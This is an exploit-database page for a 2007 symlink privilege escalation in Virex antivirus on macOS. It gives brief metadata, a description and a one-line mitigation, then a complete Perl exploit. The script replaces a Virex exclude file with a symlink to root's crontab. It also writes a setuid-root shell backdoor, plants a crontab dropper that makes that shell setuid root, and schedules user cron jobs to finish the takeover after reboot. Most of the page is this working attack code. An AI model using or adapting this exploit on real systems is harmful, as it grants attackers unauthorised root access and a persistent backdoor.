header-logo
Suggest Exploit
vendor:
Virex
by:
kf
7.5
CVSS
HIGH
Symlink Privilege Escalation
CWE
Product Name: Virex
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Symlink Privilege Escalation in Virex

This exploit takes advantage of a symlink vulnerability in Virex to escalate privileges and gain root access on the target system. By creating a symlink to the root crontab file, the attacker can execute arbitrary commands with root privileges. The exploit also sets up a backdoor for future access and drops a root crontab dropper.

Mitigation:

The vendor should patch the vulnerability by implementing proper symlink handling and access controls. Additionally, users should keep their software up to date and avoid running untrusted scripts or commands.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Following symlinks is bad mmmmmmmmmmkay!
#

$dest = "/var/cron/tabs/root";

$tgts{"0"} = "Virex 7.7.dmg:\"/Library/Application
Support/Virex/VShieldExclude.txt\"  ";

unless (($target) = @ARGV) {
       print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

       foreach $key (sort(keys %tgts)) {
               ($a,$b) = split(/\:/,$tgts{"$key"});
               print "\t$key . $a\n";
       }

       print "\n";
       exit 1;
}

($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";

# Set aside a backdoor that we will chmod and chown later
open(BD,">/tmp/pwnrex.c");
printf BD "main()\n";
printf BD "{ seteuid(0); setegid(0); setuid(0); setgid(0);
system(\"/bin/sh -i\"); }\n";
#system("gcc -o /Users/Shared/shX /tmp/pwnrex.c");
system("cp /usr/bin/id  /Users/Shared/shX");  # this is for those without gcc.

# set aside root crontab dropper
open(PH,">/Users/Shared/droptab.pl");
print PH "system\(\"echo \'* * * * * /usr/sbin/chown root: /Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX\' > /var/cron/tabs/root\"\)\;\n";

# rm the existing log file and symlink it to the root crontab file. A
reboot will be required to exploit this.
system("rm -rf $b; ln -s $dest $b");

# start up a crontab request that will be *VERY* useful after the machine has rebooted.
system("echo '* * * * * /usr/bin/perl /Users/Shared/droptab.pl; sleep 90; crontab /Users/Shared/xxx' > /tmp/user_cron");
system("echo '* * * * * /usr/bin/id' >  /Users/Shared/xxx");
system("crontab /tmp/user_cron");

print "wait for a reboot and a cron run...\n"

# milw0rm.com [2007-02-28]